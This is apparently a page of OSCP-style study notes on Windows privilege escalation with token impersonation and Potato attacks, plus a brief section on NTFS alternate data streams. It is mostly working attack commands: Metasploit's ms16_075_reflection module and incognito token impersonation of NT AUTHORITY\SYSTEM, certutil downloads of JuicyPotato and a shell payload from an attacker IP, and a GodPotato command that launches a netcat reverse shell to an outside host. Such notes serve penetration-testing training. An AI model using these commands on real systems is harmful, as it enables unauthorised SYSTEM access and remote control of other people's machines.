> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/windows-privilege-escalation/impersonation-and-potato-attacks.md).

# Impersonation and Potato Attacks

## Token Impersonation Overview

[Token impersonation explained](/active-directory/post-compromise-attacks/token-impersonation.md)

<figure><img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""><figcaption><p>HTB Machine Jeeves</p></figcaption></figure>

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-impersonation-privileges>" %}

## Potato Attack Overview

<figure><img src="/files/kSOCeuSTpVJz0qPxv6FY" alt=""><figcaption><p>High level Overview from foxglovesecurity </p></figcaption></figure>

## Escalation via Potato Attack

After getting a **meterpreter** shell

```bash
background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

```

Inside of new **meterpreter** shell

```bash
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
```

## Manual Juicy Potato Attack

```
cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"
```

#### GOD POTATO

```
godpotato.exe -cmd "cmd /c whoami"
```

`.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"`

## Resources

{% embed url="<https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe>" %}

{% embed url="<https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/>" %}
Technical Overview
{% endembed %}

{% embed url="<https://github.com/ohpe/juicy-potato>" %}
Other Version
{% endembed %}

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato>" %}

## Bonus

### Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

```
dir /r
more hm.txt:root.txt:$DATA
```

{% embed url="<https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/>" %}
